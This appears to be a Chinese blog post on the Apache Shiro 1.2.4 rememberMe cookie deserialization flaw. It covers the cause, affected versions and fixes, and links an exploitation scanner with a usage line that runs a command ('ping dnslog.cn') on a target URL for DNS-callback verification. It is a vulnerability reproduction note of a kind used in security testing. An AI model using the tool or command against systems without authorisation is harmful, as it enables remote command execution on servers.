apache shiro 1.2.4反序列化漏洞

Apache Shiro 简介


Apache Shiro 是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

漏洞成因


Apache Shiro 反序列化漏洞的主要成因是 shiro 在进行 remember me 操作时,将用户信息序列化后加密存储在cookie中,当shiro 获取这个cookie进行反序列化操作获取原始用户信息时,没有严格限制反序列化内容,导致了命令执行。

影响版本


Apache Shiro <= 1.2.4

漏洞利用


工具地址:

https://github.com/sv3nbeast/ShiroScan

 

用法:

usage:python3 shiro.py http://url.com "ping dnslog.cn"

apache shiro 1.2.4反序列化漏洞_第1张图片

验证推荐使用这个dnslog平台,速度比ceye.io要快很多,在线免登陆生成临时二级子域名,可查询到dns解析记录

http://www.dnslog.cn/

apache shiro 1.2.4反序列化漏洞_第2张图片


为防止原作者的github链接失效,特地保存一份百度云

链接:https://pan.baidu.com/s/1Giy_1RlE1tmlAuO3yvrGWA

提取码:d37s

解决建议:


1. 升级apache shrio至1.2.4以上版本(不包括1.2.4)。

2. 禁止使用默认key或者网上公开的key,需使用动态认证key。

你可能感兴趣的:(漏洞复现)